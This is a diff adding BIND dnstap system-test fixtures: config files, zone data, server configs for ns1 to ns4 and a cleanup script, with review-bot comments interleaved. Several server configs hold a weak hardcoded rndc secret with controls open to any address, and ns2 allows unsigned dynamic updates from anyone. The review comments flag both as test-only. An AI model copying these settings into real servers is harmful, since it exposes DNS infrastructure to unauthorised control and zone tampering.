--- /dev/null
+++ b/bin/tests/system/dnstap/bad-fstrm-set-input-queue-size-max.conf
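Review bot: The file name and the value disagree in `bad-fstrm-set-flush-timeout-max.conf`: it sets `fstrm-set-flush-timeout 0;`, while the `-min` fixture that follows uses `601`, so each name points at the opposite bound from the one its value appears to violate. The same inversion shows up in `bad-fstrm-set-input-queue-size-max.conf` (value `1`) and its `-min.conf` counterpart (value `16385`), whereas the buffer-hint, output-queue-size and reopen-interval pairs are named the expected way round. Either swap the names or add a one-line comment in each fixture, e.g. `/* below the accepted minimum */`, so that a failing range check is traced to the right bound.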
@@ -0,0 +1,16 @@
+/*
+ * Copyright (C) Internet Systems Consortium, Inc. ("ISC")
+ *
+ * SPDX-License-Identifier: MPL-2.0
+ *
+ * This Source Code Form is subject to the terms of the Mozilla Public
+ * License, v. 2.0. If a copy of the MPL was not distributed with this
+ * file, you can obtain one at https://mozilla.org/MPL/2.0/.
+ *
+ * See the COPYRIGHT file distributed with this work for additional
+ * information regarding copyright ownership.
+ */
+
+options {
+ fstrm-set-input-queue-size 1;
+};
diff --git a/bin/tests/system/dnstap/bad-fstrm-set-input-queue-size-min.conf b/bin/tests/system/dnstap/bad-fstrm-set-input-queue-size-min.conf
new file mode 100644
index 0000000..787f656
--- /dev/null
+++ b/bin/tests/system/dnstap/bad-fstrm-set-input-queue-size-min.conf
@@ -0,0 +1,16 @@
+/*
+ * Copyright (C) Internet Systems Consortium, Inc. ("ISC")
+ *
+ * SPDX-License-Identifier: MPL-2.0
+ *
+ * This Source Code Form is subject to the terms of the Mozilla Public
+ * License, v. 2.0. If a copy of the MPL was not distributed with this
+ * file, you can obtain one at https://mozilla.org/MPL/2.0/.
+ *
+ * See the COPYRIGHT file distributed with this work for additional
+ * information regarding copyright ownership.
+ */
+
+options {
+ fstrm-set-input-queue-size 16385;
+};
diff --git a/bin/tests/system/dnstap/bad-fstrm-set-input-queue-size-po2.conf b/bin/tests/system/dnstap/bad-fstrm-set-input-queue-size-po2.conf
new file mode 100644
index 0000000..ae713d3
--- /dev/null
+++ b/bin/tests/system/dnstap/bad-fstrm-set-input-queue-size-po2.conf
@@ -0,0 +1,16 @@
+/*
+ * Copyright (C) Internet Systems Consortium, Inc. ("ISC")
+ *
+ * SPDX-License-Identifier: MPL-2.0
+ *
+ * This Source Code Form is subject to the terms of the Mozilla Public
+ * License, v. 2.0. If a copy of the MPL was not distributed with this
+ * file, you can obtain one at https://mozilla.org/MPL/2.0/.
+ *
+ * See the COPYRIGHT file distributed with this work for additional
+ * information regarding copyright ownership.
+ */
+
+options {
+ fstrm-set-input-queue-size 513;
+};
diff --git a/bin/tests/system/dnstap/bad-fstrm-set-output-notify-threshold.conf b/bin/tests/system/dnstap/bad-fstrm-set-output-notify-threshold.conf
new file mode 100644
index 0000000..643e2b8
--- /dev/null
+++ b/bin/tests/system/dnstap/bad-fstrm-set-output-notify-threshold.conf
@@ -0,0 +1,16 @@
+/*
+ * Copyright (C) Internet Systems Consortium, Inc. ("ISC")
+ *
+ * SPDX-License-Identifier: MPL-2.0
+ *
+ * This Source Code Form is subject to the terms of the Mozilla Public
+ * License, v. 2.0. If a copy of the MPL was not distributed with this
+ * file, you can obtain one at https://mozilla.org/MPL/2.0/.
+ *
+ * See the COPYRIGHT file distributed with this work for additional
+ * information regarding copyright ownership.
+ */
+
+options {
+ fstrm-set-output-notify-threshold 0;
+};
diff --git a/bin/tests/system/dnstap/bad-fstrm-set-output-queue-size-max.conf b/bin/tests/system/dnstap/bad-fstrm-set-output-queue-size-max.conf
new file mode 100644
index 0000000..853713f
--- /dev/null
+++ b/bin/tests/system/dnstap/bad-fstrm-set-output-queue-size-max.conf
@@ -0,0 +1,19 @@
+/*
+ * Copyright (C) Internet Systems Consortium, Inc. ("ISC")
+ *
+ * SPDX-License-Identifier: MPL-2.0
+ *
+ * This Source Code Form is subject to the terms of the Mozilla Public
+ * License, v. 2.0. If a copy of the MPL was not distributed with this
+ * file, you can obtain one at https://mozilla.org/MPL/2.0/.
+ *
+ * See the COPYRIGHT file distributed with this work for additional
+ * information regarding copyright ownership.
+ */
+
+options {
+ /*
+ * This value is system dependent and matches IOV_MAX.
+ */
+ fstrm-set-output-queue-size 10000000;
+};
diff --git a/bin/tests/system/dnstap/bad-fstrm-set-output-queue-size-min.conf b/bin/tests/system/dnstap/bad-fstrm-set-output-queue-size-min.conf
new file mode 100644
index 0000000..7940c89
--- /dev/null
+++ b/bin/tests/system/dnstap/bad-fstrm-set-output-queue-size-min.conf
@@ -0,0 +1,16 @@
+/*
+ * Copyright (C) Internet Systems Consortium, Inc. ("ISC")
+ *
+ * SPDX-License-Identifier: MPL-2.0
+ *
+ * This Source Code Form is subject to the terms of the Mozilla Public
+ * License, v. 2.0. If a copy of the MPL was not distributed with this
+ * file, you can obtain one at https://mozilla.org/MPL/2.0/.
+ *
+ * See the COPYRIGHT file distributed with this work for additional
+ * information regarding copyright ownership.
+ */
+
+options {
+ fstrm-set-output-queue-size 1;
+};
diff --git a/bin/tests/system/dnstap/bad-fstrm-set-reopen-interval-max.conf b/bin/tests/system/dnstap/bad-fstrm-set-reopen-interval-max.conf
new file mode 100644
index 0000000..9cfa9e3
--- /dev/null
+++ b/bin/tests/system/dnstap/bad-fstrm-set-reopen-interval-max.conf
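Review bot: The comment inside `options` in `bad-fstrm-set-output-queue-size-max.conf` reads as if `10000000` were the value of IOV_MAX, which is not what a `bad-` fixture would want. Presumably the accepted maximum is what depends on IOV_MAX, and this number is meant to exceed it on every platform. I would reword the comment to `/* The upper limit is system dependent (IOV_MAX); this value is assumed to exceed it everywhere. */`. If some system's limit could be larger, the fixture would stop being rejected there, so the assumption is worth stating.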
@@ -0,0 +1,16 @@
+/*
+ * Copyright (C) Internet Systems Consortium, Inc. ("ISC")
+ *
+ * SPDX-License-Identifier: MPL-2.0
+ *
+ * This Source Code Form is subject to the terms of the Mozilla Public
+ * License, v. 2.0. If a copy of the MPL was not distributed with this
+ * file, you can obtain one at https://mozilla.org/MPL/2.0/.
+ *
+ * See the COPYRIGHT file distributed with this work for additional
+ * information regarding copyright ownership.
+ */
+
+options {
+ fstrm-set-reopen-interval 601;
+};
diff --git a/bin/tests/system/dnstap/bad-fstrm-set-reopen-interval-min.conf b/bin/tests/system/dnstap/bad-fstrm-set-reopen-interval-min.conf
new file mode 100644
index 0000000..be6a640
--- /dev/null
+++ b/bin/tests/system/dnstap/bad-fstrm-set-reopen-interval-min.conf
@@ -0,0 +1,16 @@
+/*
+ * Copyright (C) Internet Systems Consortium, Inc. ("ISC")
+ *
+ * SPDX-License-Identifier: MPL-2.0
+ *
+ * This Source Code Form is subject to the terms of the Mozilla Public
+ * License, v. 2.0. If a copy of the MPL was not distributed with this
+ * file, you can obtain one at https://mozilla.org/MPL/2.0/.
+ *
+ * See the COPYRIGHT file distributed with this work for additional
+ * information regarding copyright ownership.
+ */
+
+options {
+ fstrm-set-reopen-interval 0;
+};
diff --git a/bin/tests/system/dnstap/bad-missing-dnstap-output-view.conf b/bin/tests/system/dnstap/bad-missing-dnstap-output-view.conf
new file mode 100644
index 0000000..853da36
--- /dev/null
+++ b/bin/tests/system/dnstap/bad-missing-dnstap-output-view.conf
@@ -0,0 +1,16 @@
+/*
+ * Copyright (C) Internet Systems Consortium, Inc. ("ISC")
+ *
+ * SPDX-License-Identifier: MPL-2.0
+ *
+ * This Source Code Form is subject to the terms of the Mozilla Public
+ * License, v. 2.0. If a copy of the MPL was not distributed with this
+ * file, you can obtain one at https://mozilla.org/MPL/2.0/.
+ *
+ * See the COPYRIGHT file distributed with this work for additional
+ * information regarding copyright ownership.
+ */
+
+view "view" {
+ dnstap { client; auth; };
+};
diff --git a/bin/tests/system/dnstap/bad-missing-dnstap-output.conf b/bin/tests/system/dnstap/bad-missing-dnstap-output.conf
new file mode 100644
index 0000000..b5565e2
--- /dev/null
+++ b/bin/tests/system/dnstap/bad-missing-dnstap-output.conf
@@ -0,0 +1,17 @@
+/*
+ * Copyright (C) Internet Systems Consortium, Inc. ("ISC")
+ *
+ * SPDX-License-Identifier: MPL-2.0
+ *
+ * This Source Code Form is subject to the terms of the Mozilla Public
+ * License, v. 2.0. If a copy of the MPL was not distributed with this
+ * file, you can obtain one at https://mozilla.org/MPL/2.0/.
+ *
+ * See the COPYRIGHT file distributed with this work for additional
+ * information regarding copyright ownership.
+ */
+
+options {
+ dnstap { client; auth; };
+ recursion yes;
+};
diff --git a/bin/tests/system/dnstap/bad-size-version.conf b/bin/tests/system/dnstap/bad-size-version.conf
new file mode 100644
index 0000000..8e31528
--- /dev/null
+++ b/bin/tests/system/dnstap/bad-size-version.conf
@@ -0,0 +1,16 @@
+/*
+ * Copyright (C) Internet Systems Consortium, Inc. ("ISC")
+ *
+ * SPDX-License-Identifier: MPL-2.0
+ *
+ * This Source Code Form is subject to the terms of the Mozilla Public
+ * License, v. 2.0. If a copy of the MPL was not distributed with this
+ * file, you can obtain one at https://mozilla.org/MPL/2.0/.
+ *
+ * See the COPYRIGHT file distributed with this work for additional
+ * information regarding copyright ownership.
+ */
+
+options {
+ dnstap-output unix "/tmp/dnstap.sock" size 10k versions 3;
+};
diff --git a/bin/tests/system/dnstap/clean.sh b/bin/tests/system/dnstap/clean.sh
new file mode 100644
index 0000000..36f1ea3
--- /dev/null
+++ b/bin/tests/system/dnstap/clean.sh
@@ -0,0 +1,31 @@
+#!/bin/sh
+
+# Copyright (C) Internet Systems Consortium, Inc. ("ISC")
+#
+# SPDX-License-Identifier: MPL-2.0
+#
+# This Source Code Form is subject to the terms of the Mozilla Public
+# License, v. 2.0. If a copy of the MPL was not distributed with this
+# file, you can obtain one at https://mozilla.org/MPL/2.0/.
+#
+# See the COPYRIGHT file distributed with this work for additional
+# information regarding copyright ownership.
+
+rm -f */named.conf
+rm -f */named.memstats
+rm -f */named.run
+rm -f */named.run.prev
+rm -f */named.stats
+rm -f dig.out*
+rm -f dnstap.out dnstap.hex
+rm -f dnstap.out.save
+rm -f fstrm_capture.out.*
+rm -f ns*/dnstap.out
+rm -f ns*/dnstap.out.save
+rm -f ns*/dnstap.out.save.?
+rm -f ns*/managed-keys.bind*
+rm -f ns*/named.lock
+rm -f ns2/dnstap.out.*
+rm -f ns2/example.db ns2/example.db.jnl
+rm -f ns3/dnstap.out.*
+rm -f ydump.out
diff --git a/bin/tests/system/dnstap/good-dnstap-in-options.conf b/bin/tests/system/dnstap/good-dnstap-in-options.conf
new file mode 100644
index 0000000..17feb5e
--- /dev/null
+++ b/bin/tests/system/dnstap/good-dnstap-in-options.conf
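Review bot: Nothing in `bad-size-version.conf` says which rule it is expected to break; presumably `size` and `versions` are rejected for a `unix` output, since `good-size-version.conf` uses the same options with `file`. A one-line comment such as `/* size and versions are only valid with file output */` would record that, if that is indeed the rule. Separately, this fixture and the two `good-size-*.conf` files name fixed paths under `/tmp`. That is harmless if they are only syntax-checked, but a relative path would avoid a predictable name in a world-writable directory should a server ever load them.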
@@ -0,0 +1,18 @@
+/*
+ * Copyright (C) Internet Systems Consortium, Inc. ("ISC")
+ *
+ * SPDX-License-Identifier: MPL-2.0
+ *
+ * This Source Code Form is subject to the terms of the Mozilla Public
+ * License, v. 2.0. If a copy of the MPL was not distributed with this
+ * file, you can obtain one at https://mozilla.org/MPL/2.0/.
+ *
+ * See the COPYRIGHT file distributed with this work for additional
+ * information regarding copyright ownership.
+ */
+
+options {
+ dnstap-output unix "/var/run/named/dnstap.sock";
+ dnstap-identity hostname;
+ dnstap { client response; };
+};
diff --git a/bin/tests/system/dnstap/good-dnstap-in-view.conf b/bin/tests/system/dnstap/good-dnstap-in-view.conf
new file mode 100644
index 0000000..2c17f6c
--- /dev/null
+++ b/bin/tests/system/dnstap/good-dnstap-in-view.conf
@@ -0,0 +1,21 @@
+/*
+ * Copyright (C) Internet Systems Consortium, Inc. ("ISC")
+ *
+ * SPDX-License-Identifier: MPL-2.0
+ *
+ * This Source Code Form is subject to the terms of the Mozilla Public
+ * License, v. 2.0. If a copy of the MPL was not distributed with this
+ * file, you can obtain one at https://mozilla.org/MPL/2.0/.
+ *
+ * See the COPYRIGHT file distributed with this work for additional
+ * information regarding copyright ownership.
+ */
+
+options {
+ dnstap-output unix "/var/run/named/dnstap.sock";
+ dnstap-identity hostname;
+};
+
+view "view" {
+ dnstap { client response; };
+};
diff --git a/bin/tests/system/dnstap/good-fstrm-reopen-interval.conf b/bin/tests/system/dnstap/good-fstrm-reopen-interval.conf
new file mode 100644
index 0000000..d525262
--- /dev/null
+++ b/bin/tests/system/dnstap/good-fstrm-reopen-interval.conf
@@ -0,0 +1,16 @@
+/*
+ * Copyright (C) Internet Systems Consortium, Inc. ("ISC")
+ *
+ * SPDX-License-Identifier: MPL-2.0
+ *
+ * This Source Code Form is subject to the terms of the Mozilla Public
+ * License, v. 2.0. If a copy of the MPL was not distributed with this
+ * file, you can obtain one at https://mozilla.org/MPL/2.0/.
+ *
+ * See the COPYRIGHT file distributed with this work for additional
+ * information regarding copyright ownership.
+ */
+
+options {
+ fstrm-set-reopen-interval 5m;
+};
diff --git a/bin/tests/system/dnstap/good-fstrm-set-buffer-hint.conf b/bin/tests/system/dnstap/good-fstrm-set-buffer-hint.conf
new file mode 100644
index 0000000..c550647
--- /dev/null
+++ b/bin/tests/system/dnstap/good-fstrm-set-buffer-hint.conf
@@ -0,0 +1,16 @@
+/*
+ * Copyright (C) Internet Systems Consortium, Inc. ("ISC")
+ *
+ * SPDX-License-Identifier: MPL-2.0
+ *
+ * This Source Code Form is subject to the terms of the Mozilla Public
+ * License, v. 2.0. If a copy of the MPL was not distributed with this
+ * file, you can obtain one at https://mozilla.org/MPL/2.0/.
+ *
+ * See the COPYRIGHT file distributed with this work for additional
+ * information regarding copyright ownership.
+ */
+
+options {
+ fstrm-set-buffer-hint 8192;
+};
diff --git a/bin/tests/system/dnstap/good-fstrm-set-flush-timeout.conf b/bin/tests/system/dnstap/good-fstrm-set-flush-timeout.conf
new file mode 100644
index 0000000..dd9abf0
--- /dev/null
+++ b/bin/tests/system/dnstap/good-fstrm-set-flush-timeout.conf
@@ -0,0 +1,16 @@
+/*
+ * Copyright (C) Internet Systems Consortium, Inc. ("ISC")
+ *
+ * SPDX-License-Identifier: MPL-2.0
+ *
+ * This Source Code Form is subject to the terms of the Mozilla Public
+ * License, v. 2.0. If a copy of the MPL was not distributed with this
+ * file, you can obtain one at https://mozilla.org/MPL/2.0/.
+ *
+ * See the COPYRIGHT file distributed with this work for additional
+ * information regarding copyright ownership.
+ */
+
+options {
+ fstrm-set-flush-timeout 1;
+};
diff --git a/bin/tests/system/dnstap/good-fstrm-set-input-queue-size.conf b/bin/tests/system/dnstap/good-fstrm-set-input-queue-size.conf
new file mode 100644
index 0000000..d01b8f8
--- /dev/null
+++ b/bin/tests/system/dnstap/good-fstrm-set-input-queue-size.conf
@@ -0,0 +1,16 @@
+/*
+ * Copyright (C) Internet Systems Consortium, Inc. ("ISC")
+ *
+ * SPDX-License-Identifier: MPL-2.0
+ *
+ * This Source Code Form is subject to the terms of the Mozilla Public
+ * License, v. 2.0. If a copy of the MPL was not distributed with this
+ * file, you can obtain one at https://mozilla.org/MPL/2.0/.
+ *
+ * See the COPYRIGHT file distributed with this work for additional
+ * information regarding copyright ownership.
+ */
+
+options {
+ fstrm-set-input-queue-size 512;
+};
diff --git a/bin/tests/system/dnstap/good-fstrm-set-output-notify-threshold.conf b/bin/tests/system/dnstap/good-fstrm-set-output-notify-threshold.conf
new file mode 100644
index 0000000..2619dc0
--- /dev/null
+++ b/bin/tests/system/dnstap/good-fstrm-set-output-notify-threshold.conf
@@ -0,0 +1,16 @@
+/*
+ * Copyright (C) Internet Systems Consortium, Inc. ("ISC")
+ *
+ * SPDX-License-Identifier: MPL-2.0
+ *
+ * This Source Code Form is subject to the terms of the Mozilla Public
+ * License, v. 2.0. If a copy of the MPL was not distributed with this
+ * file, you can obtain one at https://mozilla.org/MPL/2.0/.
+ *
+ * See the COPYRIGHT file distributed with this work for additional
+ * information regarding copyright ownership.
+ */
+
+options {
+ fstrm-set-output-notify-threshold 32;
+};
diff --git a/bin/tests/system/dnstap/good-fstrm-set-output-queue-model-mpsc.conf b/bin/tests/system/dnstap/good-fstrm-set-output-queue-model-mpsc.conf
new file mode 100644
index 0000000..a81ff7c
--- /dev/null
+++ b/bin/tests/system/dnstap/good-fstrm-set-output-queue-model-mpsc.conf
@@ -0,0 +1,16 @@
+/*
+ * Copyright (C) Internet Systems Consortium, Inc. ("ISC")
+ *
+ * SPDX-License-Identifier: MPL-2.0
+ *
+ * This Source Code Form is subject to the terms of the Mozilla Public
+ * License, v. 2.0. If a copy of the MPL was not distributed with this
+ * file, you can obtain one at https://mozilla.org/MPL/2.0/.
+ *
+ * See the COPYRIGHT file distributed with this work for additional
+ * information regarding copyright ownership.
+ */
+
+options {
+ fstrm-set-output-queue-model mpsc;
+};
diff --git a/bin/tests/system/dnstap/good-fstrm-set-output-queue-model-spsc.conf b/bin/tests/system/dnstap/good-fstrm-set-output-queue-model-spsc.conf
new file mode 100644
index 0000000..7b394eb
--- /dev/null
+++ b/bin/tests/system/dnstap/good-fstrm-set-output-queue-model-spsc.conf
@@ -0,0 +1,16 @@
+/*
+ * Copyright (C) Internet Systems Consortium, Inc. ("ISC")
+ *
+ * SPDX-License-Identifier: MPL-2.0
+ *
+ * This Source Code Form is subject to the terms of the Mozilla Public
+ * License, v. 2.0. If a copy of the MPL was not distributed with this
+ * file, you can obtain one at https://mozilla.org/MPL/2.0/.
+ *
+ * See the COPYRIGHT file distributed with this work for additional
+ * information regarding copyright ownership.
+ */
+
+options {
+ fstrm-set-output-queue-model spsc;
+};
diff --git a/bin/tests/system/dnstap/good-fstrm-set-output-queue-size.conf b/bin/tests/system/dnstap/good-fstrm-set-output-queue-size.conf
new file mode 100644
index 0000000..87bf028
--- /dev/null
+++ b/bin/tests/system/dnstap/good-fstrm-set-output-queue-size.conf
@@ -0,0 +1,16 @@
+/*
+ * Copyright (C) Internet Systems Consortium, Inc. ("ISC")
+ *
+ * SPDX-License-Identifier: MPL-2.0
+ *
+ * This Source Code Form is subject to the terms of the Mozilla Public
+ * License, v. 2.0. If a copy of the MPL was not distributed with this
+ * file, you can obtain one at https://mozilla.org/MPL/2.0/.
+ *
+ * See the COPYRIGHT file distributed with this work for additional
+ * information regarding copyright ownership.
+ */
+
+options {
+ fstrm-set-output-queue-size 64;
+};
diff --git a/bin/tests/system/dnstap/good-fstrm-set-reopen-interval.conf b/bin/tests/system/dnstap/good-fstrm-set-reopen-interval.conf
new file mode 100644
index 0000000..116d3ae
--- /dev/null
+++ b/bin/tests/system/dnstap/good-fstrm-set-reopen-interval.conf
@@ -0,0 +1,16 @@
+/*
+ * Copyright (C) Internet Systems Consortium, Inc. ("ISC")
+ *
+ * SPDX-License-Identifier: MPL-2.0
+ *
+ * This Source Code Form is subject to the terms of the Mozilla Public
+ * License, v. 2.0. If a copy of the MPL was not distributed with this
+ * file, you can obtain one at https://mozilla.org/MPL/2.0/.
+ *
+ * See the COPYRIGHT file distributed with this work for additional
+ * information regarding copyright ownership.
+ */
+
+options {
+ fstrm-set-reopen-interval 5;
+};
diff --git a/bin/tests/system/dnstap/good-size-unlimited.conf b/bin/tests/system/dnstap/good-size-unlimited.conf
new file mode 100644
index 0000000..8cb9712
--- /dev/null
+++ b/bin/tests/system/dnstap/good-size-unlimited.conf
@@ -0,0 +1,17 @@
+/*
+ * Copyright (C) Internet Systems Consortium, Inc. ("ISC")
+ *
+ * SPDX-License-Identifier: MPL-2.0
+ *
+ * This Source Code Form is subject to the terms of the Mozilla Public
+ * License, v. 2.0. If a copy of the MPL was not distributed with this
+ * file, you can obtain one at https://mozilla.org/MPL/2.0/.
+ *
+ * See the COPYRIGHT file distributed with this work for additional
+ * information regarding copyright ownership.
+ */
+
+options {
+ dnstap-output file "/tmp/dnstap.log"
+ size unlimited versions unlimited suffix increment;
+};
diff --git a/bin/tests/system/dnstap/good-size-version.conf b/bin/tests/system/dnstap/good-size-version.conf
new file mode 100644
index 0000000..ca1fba3
--- /dev/null
+++ b/bin/tests/system/dnstap/good-size-version.conf
@@ -0,0 +1,17 @@ +/* + * Copyright (C) Internet Systems Consortium, Inc. ("ISC") + * + * SPDX-License-Identifier: MPL-2.0 + * + * This Source Code Form is subject to the terms of the Mozilla Public + * License, v. 2.0. If a copy of the MPL was not distributed with this + * file, you can obtain one at https://mozilla.org/MPL/2.0/. + * + * See the COPYRIGHT file distributed with this work for additional + * information regarding copyright ownership. + */ + +options { + dnstap-output file "/tmp/dnstap.log" + size 10k versions 3 suffix timestamp; +}; diff --git a/bin/tests/system/dnstap/large-answer.fstrm b/bin/tests/system/dnstap/large-answer.fstrm Binary files differnew file mode 100644 index 0000000..873b315 --- /dev/null +++ b/bin/tests/system/dnstap/large-answer.fstrm diff --git a/bin/tests/system/dnstap/ns1/named.conf.in b/bin/tests/system/dnstap/ns1/named.conf.in new file mode 100644 index 0000000..c2c0087 --- /dev/null +++ b/bin/tests/system/dnstap/ns1/named.conf.in 
@@ -0,0 +1,47 @@
+/*
+ * Copyright (C) Internet Systems Consortium, Inc. ("ISC")
+ *
+ * SPDX-License-Identifier: MPL-2.0
+ *
+ * This Source Code Form is subject to the terms of the Mozilla Public
+ * License, v. 2.0. If a copy of the MPL was not distributed with this
+ * file, you can obtain one at https://mozilla.org/MPL/2.0/.
+ *
+ * See the COPYRIGHT file distributed with this work for additional
+ * information regarding copyright ownership.
+ */
+
+options {
+ query-source address 10.53.0.1;
+ notify-source 10.53.0.1;
+ transfer-source 10.53.0.1;
+ port @PORT@;
+ pid-file "named.pid";
+ listen-on { 10.53.0.1; };
+ listen-on-v6 { none; };
+ recursion no;
+ notify yes;
+ statistics-file "named.stats";
+ dnstap-identity "ns1";
+ dnstap-version "xxx";
+ dnstap-output file "dnstap.out" size 30k versions 10;
+ dnstap { all; };
+ send-cookie no;
+ require-server-cookie no;
+ dnssec-validation yes;
+ qname-minimization disabled;
+};
+
+key rndc_key {
+ secret "1234abcd8765";
+ algorithm hmac-sha256;
+};
+
+controls {
+ inet 10.53.0.1 port @CONTROLPORT@ allow { any; } keys { rndc_key; };
+};
+
+zone "." {
+ type primary;
+ file "root.db";
+};
diff --git a/bin/tests/system/dnstap/ns1/root.db b/bin/tests/system/dnstap/ns1/root.db
new file mode 100644
index 0000000..17780d1
--- /dev/null
+++ b/bin/tests/system/dnstap/ns1/root.db
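Review bot: The `key rndc_key` block carries a short literal secret (`secret "1234abcd8765";`) and the `controls` statement pairs it with `allow { any; }`, with no comment saying that this is a test fixture; the ns2, ns3 and ns4 named.conf.in files in this commit repeat the same block. tests.sh drives these servers with `-c ../common/rndc.conf`, so the value is presumably the suite-wide shared key and cannot be changed in this file alone. It should at least be documented so the block is not copied elsewhere, e.g. above the key: `/* Test-only rndc key shared by the system tests; bound to the 10.53.0.x test addresses. Never reuse outside the test suite. */`.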
@@ -0,0 +1,24 @@
+; Copyright (C) Internet Systems Consortium, Inc. ("ISC")
+;
+; SPDX-License-Identifier: MPL-2.0
+;
+; This Source Code Form is subject to the terms of the Mozilla Public
+; License, v. 2.0. If a copy of the MPL was not distributed with this
+; file, you can obtain one at https://mozilla.org/MPL/2.0/.
+;
+; See the COPYRIGHT file distributed with this work for additional
+; information regarding copyright ownership.
+
+$TTL 300
+. IN SOA gson.nominum.com. a.root.servers.nil. (
+ 2000042100 ; serial
+ 600 ; refresh
+ 600 ; retry
+ 1200 ; expire
+ 600 ; minimum
+ )
+. NS a.root-servers.nil.
+a.root-servers.nil. A 10.53.0.1
+
+example. NS ns2.example.
+ns2.example. A 10.53.0.2
diff --git a/bin/tests/system/dnstap/ns2/example.db.in b/bin/tests/system/dnstap/ns2/example.db.in
new file mode 100644
index 0000000..7f88dec
--- /dev/null
+++ b/bin/tests/system/dnstap/ns2/example.db.in
@@ -0,0 +1,30 @@
+; Copyright (C) Internet Systems Consortium, Inc. ("ISC")
+;
+; SPDX-License-Identifier: MPL-2.0
+;
+; This Source Code Form is subject to the terms of the Mozilla Public
+; License, v. 2.0. If a copy of the MPL was not distributed with this
+; file, you can obtain one at https://mozilla.org/MPL/2.0/.
+;
+; See the COPYRIGHT file distributed with this work for additional
+; information regarding copyright ownership.
+
+$ORIGIN .
+$TTL 300 ; 5 minutes
+example IN SOA mname1. . (
+ 1 ; serial
+ 20 ; refresh (20 seconds)
+ 20 ; retry (20 seconds)
+ 1814400 ; expire (3 weeks)
+ 3600 ; minimum (1 hour)
+ )
+example. NS ns2.example.
+ns2.example. A 10.53.0.2
+
+$ORIGIN example.
+a A 10.0.0.1
+a A 10.0.0.3
+a A 10.0.0.5
+ MX 10 mail.example.
+
+mail A 10.0.0.2
diff --git a/bin/tests/system/dnstap/ns2/named.conf.in b/bin/tests/system/dnstap/ns2/named.conf.in
new file mode 100644
index 0000000..1c1713a
--- /dev/null
+++ b/bin/tests/system/dnstap/ns2/named.conf.in
@@ -0,0 +1,53 @@
+/*
+ * Copyright (C) Internet Systems Consortium, Inc. ("ISC")
+ *
+ * SPDX-License-Identifier: MPL-2.0
+ *
+ * This Source Code Form is subject to the terms of the Mozilla Public
+ * License, v. 2.0. If a copy of the MPL was not distributed with this
+ * file, you can obtain one at https://mozilla.org/MPL/2.0/.
+ *
+ * See the COPYRIGHT file distributed with this work for additional
+ * information regarding copyright ownership.
+ */
+
+options {
+ query-source address 10.53.0.2;
+ notify-source 10.53.0.2;
+ transfer-source 10.53.0.2;
+ port @PORT@;
+ pid-file "named.pid";
+ listen-on { 10.53.0.2; };
+ listen-on-v6 { none; };
+ recursion yes;
+ notify yes;
+ statistics-file "named.stats";
+ dnstap-identity "ns2";
+ dnstap-version "xxx";
+ dnstap-output file "dnstap.out" size unlimited versions unlimited;
+ dnstap { all; };
+ send-cookie no;
+ require-server-cookie no;
+ dnssec-validation yes;
+ qname-minimization disabled;
+};
+
+key rndc_key {
+ secret "1234abcd8765";
+ algorithm hmac-sha256;
+};
+
+controls {
+ inet 10.53.0.2 port @CONTROLPORT@ allow { any; } keys { rndc_key; };
+};
+
+zone "." {
+ type hint;
+ file "../../common/root.hint";
+};
+
+zone "example" {
+ type primary;
+ file "example.db";
+ allow-update { any; };
+};
diff --git a/bin/tests/system/dnstap/ns3/named.args b/bin/tests/system/dnstap/ns3/named.args
new file mode 100644
index 0000000..fb42af2
--- /dev/null
+++ b/bin/tests/system/dnstap/ns3/named.args
@@ -0,0 +1,2 @@
+# Using "-n 1" allows GL #1795 to be reliably reproduced
+-D dnstap-ns3 -X named.lock -m record,size,mctx -c named.conf -d 99 -g -U 4 -n 1 -T maxcachesize=2097152
diff --git a/bin/tests/system/dnstap/ns3/named.conf.in b/bin/tests/system/dnstap/ns3/named.conf.in
new file mode 100644
index 0000000..24320ed
--- /dev/null
+++ b/bin/tests/system/dnstap/ns3/named.conf.in
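Review bot: `allow-update { any; };` on zone "example" in ns2/named.conf.in accepts unsigned dynamic updates from any client that can reach the listener, and nothing in the file says that this is deliberate. tests.sh sends an unauthenticated `nsupdate` to 10.53.0.2 and later expects one UPDATE_QUERY and one UPDATE_RESPONSE on ns2, so the open ACL appears to be what the test relies on. A comment on that line would make the intent explicit and discourage copying it, for example `/* open on purpose: tests.sh sends an unsigned UPDATE to count UQ/UR messages */`.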
@@ -0,0 +1,50 @@
+/*
+ * Copyright (C) Internet Systems Consortium, Inc. ("ISC")
+ *
+ * SPDX-License-Identifier: MPL-2.0
+ *
+ * This Source Code Form is subject to the terms of the Mozilla Public
+ * License, v. 2.0. If a copy of the MPL was not distributed with this
+ * file, you can obtain one at https://mozilla.org/MPL/2.0/.
+ *
+ * See the COPYRIGHT file distributed with this work for additional
+ * information regarding copyright ownership.
+ */
+
+options {
+ query-source address 10.53.0.3;
+ notify-source 10.53.0.3;
+ transfer-source 10.53.0.3;
+ port @PORT@;
+ directory ".";
+ pid-file "named.pid";
+ listen-on { 10.53.0.3; };
+ listen-on-v6 { none; };
+ recursion yes;
+ notify yes;
+ dnstap-identity "ns3";
+ dnstap-version "xxx";
+ dnstap-output file "dnstap.out";
+ dnstap { all; };
+ send-cookie no;
+ require-server-cookie no;
+ minimal-responses no;
+ dnssec-validation yes;
+ qname-minimization disabled;
+};
+
+server 10.53.0.1 { tcp-only yes; };
+
+key rndc_key {
+ secret "1234abcd8765";
+ algorithm hmac-sha256;
+};
+
+controls {
+ inet 10.53.0.3 port @CONTROLPORT@ allow { any; } keys { rndc_key; };
+};
+
+zone "." {
+ type hint;
+ file "../../common/root.hint";
+};
diff --git a/bin/tests/system/dnstap/ns4/named.conf.in b/bin/tests/system/dnstap/ns4/named.conf.in
new file mode 100644
index 0000000..e821f5e
--- /dev/null
+++ b/bin/tests/system/dnstap/ns4/named.conf.in
@@ -0,0 +1,49 @@
+/*
+ * Copyright (C) Internet Systems Consortium, Inc. ("ISC")
+ *
+ * SPDX-License-Identifier: MPL-2.0
+ *
+ * This Source Code Form is subject to the terms of the Mozilla Public
+ * License, v. 2.0. If a copy of the MPL was not distributed with this
+ * file, you can obtain one at https://mozilla.org/MPL/2.0/.
+ *
+ * See the COPYRIGHT file distributed with this work for additional
+ * information regarding copyright ownership.
+ */
+
+options {
+ query-source address 10.53.0.4;
+ notify-source 10.53.0.4;
+ transfer-source 10.53.0.4;
+ port @PORT@;
+ directory ".";
+ pid-file "named.pid";
+ listen-on { 10.53.0.4; };
+ listen-on-v6 { none; };
+ recursion yes;
+ notify yes;
+ dnstap-identity "ns4";
+ dnstap-version "xxx";
+ dnstap-output unix "dnstap.out";
+ dnstap { all; };
+ send-cookie no;
+ require-server-cookie no;
+ dnssec-validation yes;
+ qname-minimization disabled;
+};
+
